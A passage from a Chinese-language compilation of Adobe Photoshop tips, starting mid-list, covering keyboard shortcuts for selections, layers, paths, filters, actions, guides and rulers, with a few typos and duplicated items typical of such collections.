12. 按住Alt键后,使用Rubber Stamp Tool(橡皮图章工具)在任意打开的图像视窗内单击鼠标,即可在该视窗内设定取样位置,但不会改变作用视窗。

13. 在使用Move Tool(移动工具)时,可按键盘上的方向键直接以1 pixel的距离移动图层上的图像,如果先按住Shift键后再按方向键则以每次10 pixel的距离移动图像。 而按Alt键拖动选区将会移动选区的拷贝。

14. 使用磁性套索工具或磁性钢笔工具时,按“[”或“]”键可以实时增加或减少采样宽度(选项调板中)。

15. 度量工具在测量距离上十分便利(特别是在斜线上),你同样可以用它来量角度(就像一只量角器)。在信息面板可视的前提下,选择度量工具点击并拖出一条直线,按住Alt键从第一条线的节点上再拖出第二条直线,这样两条线间的夹角和线的长度都显示在信息面板上。用测量工具拖动可以移动测量线(也可以只单独移动测量线的一个节点),把测量线拖到画布以外就可以把它删除。

16. 使用绘画工具如(如画笔,向笔等),按住Shift键单击鼠标,可将两次单击点以直线连接。

17. 按住Alt键用吸管工具选取颜色即可定义当前背景色。通过结合颜色取样器工具(Shift+I)和信息面板监视当前图片的颜色变化。变化前后的颜色值显示在信息面板上其取样点编号的旁边。通过信息面板上的弹出菜单可以定义取样点的色彩模式。要增加新取样点只需在画布上用颜色取样器工具随便什么地方再点一下,按住Alt键点击可以除去取样点。但一张图上最多只能放置四个颜色取样点。当Photoshop中有对话框(例如:色阶命令、曲线命令等等)弹出时,要增加新的取样点必须按住Shift键再点击,按住Alt+Shift点击可以减去一个取样点。

18. 裁切工具大家都一定用过,这种情况你也一定遇到过;在你调整裁切握、而裁切框又比较接近图像边界的时候,裁减框会自动地贴到图像的边上,令你无法精确的裁切图像。不过只要在调整裁切边框的时候接下“Ctrl”键,那么裁切框就会服服帖帖,让你精确裁切。

复制技巧

19. 按住Ctrl+Alt键拖动鼠标可以复制当前层或选区内容。

20. 如果你最近拷贝了一张图片存在剪贴板里,Photoshop在新建文件(Ctrl+N)的时候会以剪贴板中图片的尺寸作为新建图的默认大小。要略过这个特性而使用上一次的设置,在打开的时候按住Alt键(Ctrl+Alt+N)。

21. 如果创作一幅新作品,需要与一幅已打开的图片有一样的尺寸、解析度、格式的文件。选取“文件”→“New”,点Photoshop菜单栏的Windows选项,在弹出菜单的最下面一栏点击已开启的图片名称,是的,就是这么简单!

22. 在使用自由变换工具(Ctrl+T)时按住Alt键(Ctrl+Alt+T)即可先复制原图层(在当前的选区)后在复制层上进行变换;Ctrl+Shift+T为再次执行上次的变换,Ctrl+Alt+Shift+T为复制原图后再执行变换。

23. 使用“通过复制新建层(Ctrl+J)”或“通过剪切新建层(Ctrl+J)”命令可以在一步之间完成拷贝到粘贴和剪切到粘贴的工作;通过复制(剪切)新建层命令粘贴时仍会放在它们原来的地方,然而通过拷贝(剪切)再粘贴,就会贴到图片(或选区)的中心。

24. 若要直接复制图像而不希望出现命名对话框,可先按住Alt键,再执行“图像”→“副本”命令。

25. Photoshop的剪贴板很好用,但你更希望直接使用Windows系统剪贴板,直接处理从屏幕上截取的图像。好的,按下Ctrl+K,在弹出的面板上将“输出到剪贴板”点中吧!

26. 在Photoshop内实现有规律复制
在做版面设计的时候我们会经常把某些元素有规律地摆放以寻求一种形式的美感,在Photoshop内通过四个快捷键的组合就可以轻易得出。
(1)圈选出你要复制的物体;
(2)按Ctrl+J产生一个浮动 Layer;
(3)按旋转并移动到适当位置后确认;
(4)现在可以按住Ctrl+Alt+Shift 后连续按“T”就可以有规律地复制出连续的物体。(只按住Ctrl+Shift则只是有规律移动)

27. 当我们要复制文件中的选择对象时,要使用编辑菜单中的复制命令。复制一次你也许觉不出麻烦,但要多次复制,一次一次的点击就相当不便了。这时你可以先用选择工具选定对象,而后点击移动工具,再按住“Alt”键不放。当光标变成一黑一白重叠在一起的两个箭头时,拖动鼠标到所需位置即可。若要多次复制,只要重复的放松鼠标就行了。

28. 可以用选框工具或套索工具,把选区从一个文档拖到另一个上。

29. 要为当前历史状态或快照建立一个复制文档可以:
(1)点击“从当前状态创建新文档”按钮;
(2)从历史面板菜单中选择新文档;
(3)拖动当前状态(或快照)到“从当前状态创建新文档”按钮上;
(4)右键点击所要的状态(或快照)从弹出菜单中选择新文档把历史状态中当前图片的某一历史状态拖到另一个图片的窗口可改变目的图片的内容。按住Alt键点击任一历史状态(除了当前的、最近的状态)可以复制它。而后被复制的状态就变为当前(最近的)状态。按住Alt拖动动作中的步骤可以把它复制到另一个动作中。
 

选择技巧

30. 把选择区域或层从一个文档拖向另一个时,按住Shift键可以使其在目的文档上居中。如果源文档和目的文档的大小(尺寸)相同,被拖动的元素会被放置在与源文档位置相同的地方(而不是放在画布的中心)。如果目的文档包含选区,所拖动的元素会被放置在选区的中心。

31. 在动作调板中单击右上角的三角形按钮,从弹出的菜单中选择载入动作,进入PhotoshopGoodiesActions目录下,其下有按钮、规格、命令、图像效果,文字效果、纹理、帧六个动作集,包含了很多实用的东西哟!另外,在该目录下还有一个ACTIONS.PDF文件,可用Adobe Acrobat软件打开,里面详细介绍了这些动作的使用方法和产生的效果。

32. 单击工具条中的画笔类工具,在随后显示的属性条中单击画笔标签右边的小三角,在弹出的菜单中再点击小箭头选择“载入画笔…”。到Photoshop目录的Brushes文件夹中选择*.abr。原来这里还有这么多可爱的东西。

33. 画出一个漂亮的标记,想在作品中重复使用?好办,用套索工具选好它,在Brushes的弹出菜单中选“储存画笔…”,然后用画笔工具选中这个新笔头……朋友,想做居室喷涂吗?

34. 如果想选择两个选择区域之间的部分,在已有的任意一个选择区域的旁边同时按住Shift和Alt键进行拖动,画第二个选择区域(鼠标十字形旁出现一个乘号,表示重合的该区域将被保留)。

35. 在选择区域中删除正方形或圆形,首先增加任意一个选择区域,然后在该选择区域内,按Alt键拖动矩形或椭圆的面罩工具。然后松开Alt键,按住Shift键,拖动到你满意为止。然后先松开鼠标按钮再松开Shift键。

36. 从中心向外删除一个选择区域,在任意一个选择区域内,先按Alt键拖动矩形或椭圆的面罩工具,然后松开Alt键后再一次按住Alt键,最后松开鼠标按钮再松开Alt键。

37. 在快速蒙版模式下要迅速切换蒙版区域或选取区域选项时,先按住Alt键后将光标移到快速遮色片模式图标上单击鼠标就可以了。

38. 使用选框工具的时候,按住Shift键可以划出正方形和正圆的选区;按住Alt键将从起始点为中心勾划选区。

39. 使用“重新选择”命令(Ctrl+Shift+D)来载入/恢复之前的选区。

40. 在使用套索工具勾画选区的时候按Alt键可以在套索工具和多边形套索工具间切换。勾画选区的时候按住空格键可以移动正在勾画的选区。

41. 按住Ctrl键点击层的图标(在层面板上)可载入它的透明通道,再按住Ctrl+Alt+Shift键点击另一层为选取两个层的透明通道相交的区域。

42. 在缩放或复制图片之间先切换到快速蒙板模式[Q]可保留原来的选区。

43. “选择框”工具中Shift和Alt键的使用方法:
当用“选择框”选取图片时,想扩大选择区,这时按住Shift键,光标“+”会变成“十+”,拖动光标,这样就可以再原来选取的基础上扩大你所需的选择区域。或是在同一副图片中同时选取两个或两个 以上的选取框。
当用“选择框”选取图片时,想在“选择框”中减去多余的图片,这时按住“Alt”键,光标“+”会变成“十-”,拖动光标,这样就可以留下你所需要的图片。
当用“选择框”选取图片时,想得到两个选取框叠加的部分,这时按住“Shift+Alt”键,光标“+”会变成“十í”,拖动光标,这样就你想要的部分。
想得到“选取框”中的正圆或正方形时,按住“Shift”键,就可以。

44. “套索”工具中Shift和Alt键的使用方法:
增加选取范围按“Shift”键。(方法和“选择框”中的1相同)
减少选取范围按“Alt”键。(方法和“选择框”中的2相同)
两个选取框叠加的区域按“Shift+Alt”键。(方法和“选择框”中的3相同)

45. “魔杖”工具中Shift和Alt键的使用方法:
增加选取范围按“Shift”键。(方法和“选择框”中的1相同)
减少选取范围按“Alt”键。(方法和“选择框”中的2相同)
两个选取框叠加的区域按“Shift+Alt”键。(方法和“选择框”中的3相同)

快捷键技巧

46. 你可以用以下的快捷键来快速浏览你的图像:
Home卷动至图像的左上角;End卷动至图像的右下角;Page UP卷动至图像的上方;Page Down卷动至图像的下方;Ctrl+Page Up卷动至图像的左方;Ctrl+Page Down卷动至图像的右方。

47. 按Ctrl键+Alt键+0键即可使图像按1:1比例显示。

48. 当你想“紧排”(调整个别字母之间的空位),首先在两个字母之间单击,然后按下Alt键后用左右方向键调整。

49. 将对话框内的设定恢复为默认,先按住Alt键后,Cancel键会变成Reset键,再单击Reset键即可。

50. 要快速改变在对话框中显示的数值,首先用鼠标点击那个数字,让光标处在对话框中,然后就可以用上下方向键来改变该数植了。如果在用方向键改变数值前先按下Shift键,那么数值的改变速度会加快。

51. Photoshop 6.0除了以往熟悉的快捷键Ctrl+Z(可以自由地在历史记录和当前状态中切换)之外,还增加了Shift+Ctrl+Z(用以按照操作次序不断的逐步恢复操作)和Alt+Ctrl+Z(使用户可以按照操作次序不断的逐步取消操作)两个快捷键。按Ctrl+Alt+Z和Ctrl+Shift+Z组合键分别为在历史记录中向后和向前(或者可以使用历史面板中的菜单来使用这些命令)。

52. 填充功能:
Shift+Backspace打开填充对话框;
Alt+Backspace和Ctrl+Backspace组合键分别为填充前景色和背景色;
按Alt+Shift+Backspace及Ctrl+Shift+Backspace组合键在填充前景及背景色的时候只填充已存在的像素(保持透明区域)。

53. 键盘上的D键、X键可迅速切换前景色和背景色。

54. 用任一绘图工具画出直线笔触:先在起点位置单击鼠标,然后按住Shift键,再将光标移到终点单击鼠标即可。

55. 打开Curve(曲线)对话框时,按Alt键后单击曲线框,可使格线更精细,再单击鼠标可恢复原状。

56. 使用矩形(椭圆)选取工具选择范围后,按住鼠标不放,再按空格键即可随意调整选取框的位置,放开后可再调整选取范围的大小。

57. 增加一个由中心向外绘制的矩形或椭圆形,在增加的任意一个选择区域内,先按Shift键拖动矩形或椭圆的面罩工具,然后放开Shift键,然后按Alt键,最后松开鼠标按钮再松开Alt键。按Enter键或Return键可关闭滑块框。若要取消更改,按Escape键 (Esc)。若要在打开弹出式滑块对话框时以10%的增量增加或减少数值,请按住Shift键并按上箭头键或者下箭头键。

58. 若要在屏幕上预览RGB模式图像的CMYK模式色彩时,可先执行“视图”→“新视图”命令,产生一个新视图后,再执行“视图”→“预览”→“CMYK”命令,即可同时观看两种模式的图像,便于比较分析。

59. 按Shift键拖移选框工具限制选框为方形或圆形;按Alt键拖移选框工具从中心开始绘制选框;按Shift+Alt键拖移选框工具则从中心开始绘制方形或圆形选框。

60. 要防止使用裁切工具时选框吸附在图片边框上,在拖动裁切工具选框上的控制点的时候按住Ctrl键即可。

61. 要修正倾斜的图像,先用测量工具在图上可以作为水平或垂直方向基准的地方画一条线(如图像的边框、门框、两眼间的水平线等等),然后从菜单中选“图像”→“旋转画布”→“任意角度…”,打开后会发现正确的旋转角度已经自动填好了,只要按确定就OK啦。

62. 可以用裁切工具来一步完成旋转和剪切的工作:先用裁切工具画一个方框,拖动选框上的控制点来调整选取框的角度和大小,最后按回车实现旋转及剪切。测量工具量出的角度同时也会自动填到数字变换工具(“编辑”→“变换” →“数字” )对话框中。

63. 裁剪图像后所有在裁剪范围之外的像素就都丢失了。要想无损失地裁剪可以用“画布大小”命令来代替。虽然Photoshop会警告你将进行一些剪切,但出于某种原因,事实上并没有将所有“被剪切掉的”数据都被保留在画面以外,但这对索引色模式不起作用。

64. 合并可见图层时按Ctrl+Alt+Shift+E为把所有可见图层复制一份后合并到当前图层。同样可以在合并图层的时候按住Alt键,会把当前层复制一份后合并到前一个层,但是Ctrl+Alt+E这个热键这时并不能起作用。

65. 按Shift+Backspace键可激活“编辑”→“填充”命令对话框,按Alt+Backspace键可将前景色填入选取框;按Ctrl+Backspace键可将背景填八选取框内。

66. 按Shift+Alt+Backspace 键可将前景色填入选取框内并保持透明设置,按Shift+CtrBackspace键可将背景色填入选取框内保持透明设置。

67. 按Alt+Ctrl+Backspace键从历史记录中填充选区或图层,按Shift+Alt+Ctrl+Backspace键从历记录中填充选区或图层并且保持透明设置。

68. 按Ctrl+“=”键可使图像显示持续放大,但窗口不随之缩小;按Ctrl+“-”键可使图像显示持续缩小,但窗口不随之缩小;按Ctrl+Alt+“=”键可使图像显示持续放大,且窗口随之放大;按Ctrl+Alt+“-”键可使图像显示持续缩小,且窗口随之缩小。

69. 移动图层和选区时,按住Shift键可做水平、垂直或45度角的移动;按键盘上的方向键可做每次1个像素的移动;按住Shift键后再按键盘上的方向键可做每次10个像素的移动。

70. 创建参考线时,按Shift键拖移参考线可以将参考线紧贴到标尺刻度处;按Alt键拖移参考线可以将参考线更改为水平或垂直取向。

71. 在“图像”→“调整”→“曲线”命令对话框中,按住Alt键于格线内单击鼠标可以使格线精细或粗糙;按住Shift键并单击控制点可选择多个控制点,按住Ctrl 键并单击某一控制点可将该点删除。

72. 若要将某一图层上的图像拷贝到尺寸不同的另一图像窗口中央位置时,可以在拖动到目的窗口时按住Shift键,则图像拖动到目的窗口后会自动居中。

73. 在使用“编辑”→“自由变换”(Ctrl+T)命令时,按住Ctrl键并拖动某一控制点可以进行自由变形调整;按住Alt键并拖动某一控制点可以进行对称变形调整;按住Shift键并拖动某一控制点可以进行按比例缩放的调整;按住Shift+Ctrl键并拖动某一控制点可以进行透视效果的调整;按Shift+Ctrl键并拖动某一控制点可以进行斜切调整;按Enter键应用变换;按Esc键取消操作。

74. 在色板调板中,按Shift键单击某一颜色块,则用前景色替代该颜色;按Shift+Alt键单击鼠标,则在点击处前景色作为新的颜色块插入;按Alt键在某一颜色块上单击,则将背景色变该颜色;按Ctrl键单击某一颜色块,会将该颜色块删除。

75. 在图层、通道、路径调板上,按Alt键单击这些调板底部的工具按钮时,对于有对话框的工具可调出相应的对话框更改设置。

76. 在图层、通道、路径调板上,按Ctrl键并单击一图层、通道或路径会将其作为选区载入;按Ctrl+Shift键并单击,则添加到当前选区;按Ctrl+Shift+Alt键并单击,则与当前选区交叉。

77. 在图层调板中使用图层蒙板时,按Shift键并单击图层蒙板缩览图,会出现一个红叉,表示禁用当前蒙板,按Alt键并单击图层蒙板缩览图,蒙板会以整幅图像的方式显示,便于观察调整。

78. 在路径调板中,按住Shift键在路径调板的路径栏上单击鼠标可切换路径是否显示。

79. 更改某一对话框的设置后,若要恢复为先前值,要按住alt键、取消按钮会变成复位按钮,在复位按钮上单击即可。

路径技巧

80. 大家在点选调整路径上的一个点后,按“Alt”键,再点击鼠标左键在点上点击一下,这时其中一根“调节线”将会消失,再点击下一个路径点时就会不受影响了。

81. 如果你用“Path”画了一条路径,而鼠标现在的状态又是钢笔的话,你只按下小键盘上的回车键(记住是小键盘上的回车,不是主键盘上的!),那么路径就马上会变为“选取区”了。

82. 如果你用钢笔工具画了一条路径,而你现在鼠标的状态又是钢笔的话,你只要按下小键盘上的回车键(记住是小键盘上的回车,不是主键盘上的!),那么路径就马上就被作为选区载入。

83. 按住Alt键后在路径控制板上的垃圾桶图标上单击鼠标可以直接删除路径。

84. 使用路径其他工具时按住Ctrl键使光标暂时变成方向选取范围工具。

85. 按住Alt键后在路径控制板上的垃圾桶图标上单击鼠标可以直接删除路径。

86. 使用路径其他工具时按住Ctrl键使光标暂时变成方向选取范围工具。

87. 点击路径面板上的空白区域可关闭所有路径的显示。

88. 在点击路径面板下方的几个按钮(用前景色填充路径、用前景色描边路径、将路径作为选区载入)时,按住Alt键可以看见一系列可用的工具或选项。

89. 如果我们需要移动整条或是多条路径,请选择所需移动的路径然后使用快捷键Ctrl+T,就可以拖动路径至任何位置。

90. 在勾勒路径时,我们最常用的操作还是像素的单线条的勾勒,但此时会出现问题,即有矩齿存在,很影响实用价值,此时我们不妨先将其路径转换为选区,然后对选区进行描边处理,同样可以得到原路径的线条,却可以消除矩齿。

91. 将选择区域转换成路径是一个非常实用的操作。此功能与控制面板中的相应图标功能一致。调用此功能时,所需要的属性设置将可在弹出的MAKE WORK PQTH设置窗口中进行。

92. 使用笔形工具制作路径时按住Shift键可以强制路径或方向线成水平、垂直或45度角,按住Ctrl键可暂时切换到路径选取工具,按住Alt键将笔形光标在黑色节点上单击可以改变方向线的方向,使曲线能够转折;按Alt键用路径选取工具单击路径会选取整个路径;要同时选取多个路径可以按住Shift后逐个单击;使用路径选工具时按住“Ctrl+Alt”键移近路径会切换到加节点与减节点笔形工具。

93. 若要切换路径是否显示,可以按住Shift键后在路径调色板的路径栏上单击鼠标, 或者在路径调色版灰色区域单击即可,还可以按Ctrl+Shift+H。 若要在Color调色板上直接切换色彩模式,可先按住Shift键后,再将光标移到色彩条上单击即可。

Actions动作技巧

94. 若要在一个动作中的一条命令后新增一条命令,可以先选中该命令,然后单击调板上的开始记录按钮,选择要增加的命令,再单击停止记录按钮即可。

95. 先按住Ctrl键后,在动作控制板上所要执行的动作的名称上双击鼠标,即可执行整个动作。

96. 若要一起执行数个宏(Action),可以先增加一个宏,然后录制每一个所要执行的宏。

97. 若要在一个宏(Action)中的某一命令后新增一条命令,可以先选中该命令,然后单击调色板上的开始录制图标,选择要增加的命令,再单击停止录制图标即可。

滤镜技巧

98. 滤镜快捷键
Ctrl+F――再次使用刚用过的滤镜。
Ctrl+Alt+F――用新的选项使用刚用过的滤镜。
Ctrl+Shift+F――退去上次用过的滤镜或调整的效果或改变合成的模式。

99. 在滤镜窗口里,按Alt键,Cancel按钮会变成Reset按钮,可恢复初始状况。想要放大在滤镜对话框中图像预览的大小,直接按下“Ctrl”,用鼠标点击预览区域即可放大;反之接下“Alt”键则预览区内的图像便迅速变小。

100. 滤镜菜单的第一行会记录上一条滤镜的使用情况,方便重复执行。

101. 在图层的面板上可对已执行滤镜后的效果调整不透明度和色彩混合等 (操作的对象必须是图层)。

102. 对选取的范围羽化(Feather)一下,能减少突兀的感觉。

103. 在使用“滤镜”→“渲染”→“云彩”的滤镜时,若要产生更多明显的云彩图案,可先按住Alt键后再执行该命令;若要生成低漫射云彩效果,可先按住Shift键后再执行命令。

104. 在使用“滤镜”→“渲染”→“光照效果”的滤镜时,若要在对话框内复制光源时,可先按住Alt键后再拖动光源即可实现复制。

105. 针对所选择的区域进行处理。如果没有选定区域,则对整个图像做处理;如果只选中某一层或某一通道,则只对当前的层或通道起作用。

106. 滤镜的处理效果以像素为单位,就是说相同的参数处理不同分辨率的图像,效果会不同。

107. RGB的模式里可以对图形使用全部的滤镜,文字一定要变成了图形才能用滤镜。

108. 使用新滤镜应先用缺省设置实验,然后试一试较低的配置,再试一试较高的配置。观察以下变化的过程及结果。用一幅较小的图像进行处理,并保存拷贝的原版文件,而不要使用“还原”。这样使操作者对所做的结果进行比较,记下自己真正喜欢的设置。

109. 在选择滤镜之前,先将图像放在一个新建立的层中,然后用滤镜处理该层。这个方法可使操作者把滤镜的作用效果混合到图像中去,或者改变混色模式,从而得到需要的效果。这个方法还可以使操作者在设计的过程中,按自己的想法随时改变图像的滤镜效果。

110. 即使操作者已经用滤镜处理层了,也可以选择“褪色...”该命令。用户使用该命令时只要调节不透明度就可以了,同时还要改变混色模式。在结束该命令之前,操作者可随意用滤镜处理该层。注意,如果使用了“还原”,就不能再更改了。

111. 有些滤镜一次可以处理一个单通道,例如绿色通道,而且可以得到非常有趣的结果。注意,处理灰阶图像时可以使用任何滤镜。

112. 用滤镜对Alpha通道进行数据处理会得到令人兴奋的结果(也可以处理灰阶图像),然后用该通道作为选取,再应用其他滤镜,通过该选取处理整个图像。该项技术尤其适用于晶体折射滤镜。

113. 用户可以打破适当的设置,观察有什么效果发生。当用户不按常规设置滤镜时,有时能得到奇妙的特殊效果。例如,将虚蒙版或灰尘与划痕的参数设置得较高,有时能平滑图像的颜色,效果特别好。

114. 有一种能产生较好特殊效果的技术,即对同(次数不适宜太多)。这项技术对担操作滤镜来说西欧特别好。当然也可以用于其他滤镜。用户还可以用同一种滤镜的不通设置、或者用完全不同的滤镜,多次用于同一选取,看看效果如何。

115. 有些滤镜的效果非常明显,细微的参数调整会导致明显的变化,因此在使用时要仔细选择,以免因为变化幅度过大而失去每个滤镜的风格。处理过渡的图像只能作为样品或范例,但它们不是最好的艺术品,使用滤镜还应根据艺术创作的需要,有选择地进行。

图层技巧

116. 要把当前的选中图层往上移:接下“ctrl +]” 组合键,就可以把当前的图层往上翻一层;按下“ctrl+[” 组合键,就可以把当前的图层往下翻一层。

117. 用鼠标将要复制的图层拖曳到面板上端的“新建”图标上可新建一个图层。

118. 在移动图层或选取范围时,按住Shift键强制做水平、垂直或45°的移动。

119. 在移动图层或选取范围时,按键盘上的方向键做每次1 pixel的移动。

120. 在移动图层或选取范围时,先按住Shift键后再按键盘上的方向键做每次10 pixel的移动。

121. 直接删除图层时可以先按住Alt键后将光标移到图层控制板上的垃圾桶上单击鼠标即可。

122. 按下Ctrl键后,你的移动工具就有自动选择功能了,这时你只要单击某个图层上的对象,那么Photoshop就会自动的切换到那个对象所在的图层;但当你放开Ctrl键,你的移动工具就不在有自动选择的功能呢,这样就很容易防止误选。

123. 不能在层面板中同时拖动多个层到另一个文档(即使它们是链接起来的)――这只会移动所选的层。

124. 要把多个层编排为一个组,最快速的方法是先把它们链接起来,然后选择编组链接图层命令(Ctrl+G)。当要在不同文档间移动多个层时就可以利用移动工具在文档间同时拖动多个层了。用这个技术同样可以用来合并(Ctrl+E)多个可见层( 因为当前层与其它层有链接时“与前一层编组命令”会变成“编组链接图层”命令 )。

125. 在层面板中按住Alt键在两层之间点击可把他们编为一组。当一些层链接在一些而你又只想把它们中的一部分编组时这个功能十分好用。因为编组命令(Ctrl+G)在当前层与其它层有链接时会转为编组链接层命令(Ctrl+G)。

126. 用鼠标双击“图层控制”面板中带“T”字样的图层还可以再次对文字进行编辑。

127. 按住Alt点击所需层前眼睛图标可隐藏/显现其它所有图层。

128. 按住Alt点击当前层前的笔刷图标可解除其与其它所有层的链接。

129. 要清除某个层上所有的层效果,按住Alt键双击该层上的层效果图标。

130. 要关掉其中一个效果,按住Alt键然后在“图层”→“图层样式”子菜单中选中它的名字;或者可以在图层效果对话框中取消它的“应用”标记。

131. 这里有一个节省时间的增加调整层的方法:只需按住Ctrl点击“创建新图层“图标(在层面板的底部)选择你想加的调整层类型!

132. 除了在通道面板中编辑层蒙板以外,按Alt点击层面板上蒙板的图标可以打开它;按住Shift键点击蒙板图标为关闭/打开蒙板(会显示一个红叉X表示关闭蒙板)。按住Alt+Shift点击层蒙板可以以红宝石色(50%红)显示。按住Ctrl键点击蒙板图标为载入它的透明选区。

133. 按层面板上的“添加图层蒙板”图标(在层面板的底部)所加入的蒙板默认显示当前选区的所有内容;按住Alt键点“添加图层蒙板”图标所加的蒙板隐藏当前选区内容。

134. 当前工具为移动工具(或随时按住Ctrl键)时,右键点击画布可以打开当前点所有层的列表(按从上到下排序 ):从列表中选择层的名字可以使其为当前层。

135. 按住Alt键点鼠标右键可以自动选择当前点最靠上的层,或者打开移动工具选项面板中的自动选择图层选项也可实现。

136. Alt+Shift+右键点击可以切换当前层是否与最上面层作链接。

137. 我们需要多层选择时,可以先用选择工具选定文件中的区域,拉制出一个选择虚框;然后按住“Alt”键,当光标变成一个右下角带一小“-”的“+”号时(这表示减少被选择的区域或像素),在第一个框的里面拉出第二个框;而后按住“ Shift”键,当光标变成一个右下角带一小“+”的大“+”号时,再在第二个框的里面拉出第三个选择框,这样二者轮流使用,就可以进行多层选择了。用这种方法也可以选择不规则对象。

138. 按Shift+“+”键( 向前 )和Shift+“-”键( 向后 )可在各种层的合成模式上切换。我们还可以按Alt+Shift+“某一字符”快速切换合成模式。
  N = 正常 (Normal)
  I = 溶解 (Dissolve)
  M = 正片叠底 (Multiply)
  S = 屏幕 (Screen)
  O = 叠加 (Overlay)
  F = 柔光(Soft Light)
  H = 强光(Hard Light)
  D = 颜色减淡 (Color Dodge)
  B = 颜色加深 (Color Burn) K = 变暗 (Darken)
  G = 变亮 (Lighten)
  E = 差值(Difference)
  X = 排除 (Exclusion)
  U = 色相 (Hue)
  T = 饱和度 (Saturation) C = 颜色 (Color)
  Y = 亮度(Luminosity) Q = 背后(Behind 1)
  L = 阈值(Threshold 2)
  R = 清除 (Clear 3)
  W = 暗调(Shadows 4)
  V = 中间调(Midtones 4)
  Z = 高光(Highlights 4)

图像处理技巧

149. 按下Ctrl键,用鼠标点击预览区域,图像放大;按下Alt键,用鼠标点击预览区域,图像缩小。

150. 制作透明背景的图片
一般来说,网络中的透明背景的图片都是GIF格式的,在Photoshop中您可以先使用指令“图像”→“模式”→“索引颜色”将图片转成256色,再使用指令FileExportGIF89a

Photoshop技巧七则

Adobe Photoshop还有很多小技巧能够使图像处理过程变的更加轻松方便。

1、将彩色图像转换为灰度图像

常见的方法是使用主菜单“图像/模式/灰度”命令,但是转换后的图像往往不能令人满意。下面来介绍一种方法,执行主菜单“图像/模式/Lab颜色模式”命令,将图像转换成为Lab颜色模式,最后在通道面板中删除通道a和通道b,这样就可以使转换后的灰度图像变的更加细腻了。

2、快速使用滴管工具

当使用毛笔、喷枪、铅笔、橡皮工具时,可以按下Alt键,这时就可以快速切换到滴管工具了。

3、切换图层

按下Ctrl键的同时,选择移动工具,单击某个图层上的对象,就会自动地切换到该对象所在的图层了。

4、快速定位图像区域

分别按快捷键Home、End、Page Up、Page Down键可以快速将视点快速移动到图像的左上角、右下角、最上方、最下方。分别按Ctrl+Page Up、Ctrl+Page Down可以快速切换视点到图像的左侧和右侧。

5、载入选区

使用钢笔工具在图像中画出一条路径以后,只要再按下数字键盘上的回车键,就可以快速载入选区了。

6、改变微调数值

在一些对话框中,经常会使用一些微调按钮来调节数值,比如使用“File/new”新建图像文件的对话框中,可以将光标放置在需要调节的数值对话框中,然后就可以利用上下方向键来改变数值了,此外,如果需要快速改变数值,可以在按住Shift键的同时,调节上下方向键。

7、上移和下移选中图层

分别按下Ctrl+]或Ctrl+[组合键,可以分别将当前选中的图层往上移动和往下移动。

photoshop 辅助线和标尺的技巧
 拖动辅助线时按住Alt键可以在水平辅助线和垂直辅助线之间切换。
按住Alt键点击一条已经存在的垂直辅助线可以把它转为水平辅助线,反
之亦然。

  注意:辅助线是通过从标尺中拖出而建立的,所以要确保标尺是打开
的[Ctrl+R] ( View/Show Rulers )。

  拖动辅助线时按住Shift键将强制其对齐到标尺上的刻度。

  双击辅助线可以打开辅助线 & 风格参数设置对话框[Ctrl+K, Ctrl+6]
( File/Preferences/Guides & Grid)。

  双击标尺[Ctrl+R]可以打开单位 & 标尺参数设置对话框[Ctrl+K, Ctrl
+5] ( File/Preferences/Units & Rulers)。
提示:也可以在信息面板上的选项菜单中选择标尺度量单位。

  标尺的坐标原点可以设置在画布的任何地方,只要从标尺的左上角开
始拖动即可应用新的坐标原点;双击左上角可以还原坐标原点到默认点。

  利用路径工具创建曲线和斜线的辅助线也不失为一个好办法。只要用
钢笔工具描绘路径即可在绘制上或上色时作为辅助线( 路径始终保持可视
)。提示:使用隐藏路径命令[Ctrl+Shift+H] ( View ? Hide Path )切换路
径显示与否。

  辅助线不仅会吸附在当前层或选区的边缘( 上下左右 ),而且会也以
( 当前层或选区的 )水平或垂直中心对齐。反过来也一样:同样选区和层
也会吸附到已经存在的辅助线上( 边缘和中心 )。
注意:辅助线不会吸附到背景层上。而且要实现上述功能先要打开“贴紧
辅助线” [Ctrl+Shift+ ; ] ( View/Snap To Guides )选项。
提示:要找到画面的中心可以新建并[Ctrl+Shift+N] ( Layer/New Layer)
并填充 [Shift+Backspace] ( Edit/Fill)一个层然后把辅助线吸附到垂
直中心和水平中心上。


Photoshop7.0中的十则快捷操作

Photoshop7.0是人们处理图象时的首选软件之一,该软件由于功能繁多,所以操作时需要用到的命令也是很多的。有时为了完成一个复杂操作,需要同时用到几个命令,如果我们用鼠标逐一地去单击选择命令的话,操作速度肯定是非常缓慢的。为了能提高操作的效率,我们应该善于使用Photoshop7.0中的快捷键。
1、需要多层选择时,可以先用选择工具选定文件中的区域,屏幕会出现一个选择虚框;接着按住键盘上的“Alt”键,当光标变成一个右下角带一小“-”的大“+”号时,这表示减少被选择的区域或像素,在第一个框的里面拉出第二个框;而后按住“Shift”键,当光标变为一个右下角带一小“+”的大“+”号时,再在第二个框的里面拉出第三个选择框,这样二者轮流使用,即可进行多层选择了。

2、在编辑图象时,我们常常使用鼠标来进行快速定位,但是使用键盘上的按钮有时能获得更好的定位效果。分别按快捷键Home、End、Page Up、Page Down键可以快速将视点快速移动到图像的左上角、右下角、最上方、最下方。分别按Ctrl+Page Up、Ctrl+Page Down可以快速切换视点到图像的左侧和右侧。

3、有时我们为了在图象编辑区中腾出更大的操作空间,需要快速隐藏工具栏和多个浮动面板,隐藏时需要用鼠标一个一个地单击操作面板上的关闭按钮,接下来再要打开控制面板时,又要用鼠标逐一打开,每次这样做十分不方便。其实我们可以同时按住键盘上的“Shift”和“Tab”键,这样浮动面板会立即隐藏起来,从屏幕上消失,再同时按下两键,面板又会显现;如果只按下“Tab”键,则工具栏连同浮动面板会一起隐藏,再按一下该键,它们会同时显现。

4、为了能获得精确的图象效果,我们经常会使用一些微调按钮来调节数值,比如使用“File/new”新建图像文件的对话框中,可以将光标放置在需要调节的数值对话框中,然后就可以利用上下方向键来改变数值了,此外,如果需要快速改变数值,可以在按住Shift键的同时,调节上下方向键。

5、按住Shift键,然后再在图像中拖动出一个新的选择区域,我们就会看到新的选择区域和以前的选择区域合并在一起构成了一个更大的选择区域;按住Alt键选择区域时,可以在以前的选择区域中减区新选择的区域;同时按住Shift键和Alt键选择区域时,可以取得与以前选择区域相交的部分。

6、按住Shift加上Tab键可以显示或隐藏除工具箱外的其它调色板。

7、在Photoshop中,有很多时候要修改设置的取值。一般情况会在取值框的右侧有一个黑三角,点击它会出现一个滑动标尺,拖动标尺就可以修改取值了,但有时不会十分精确。这时可以按键盘上的向下箭头键(每按一下表示取值加一)和向上箭头键(每按一下表示取值减一),来准确调整数值。如果按住“Shift”键不放,那么每按一下表示取值加10或减10。

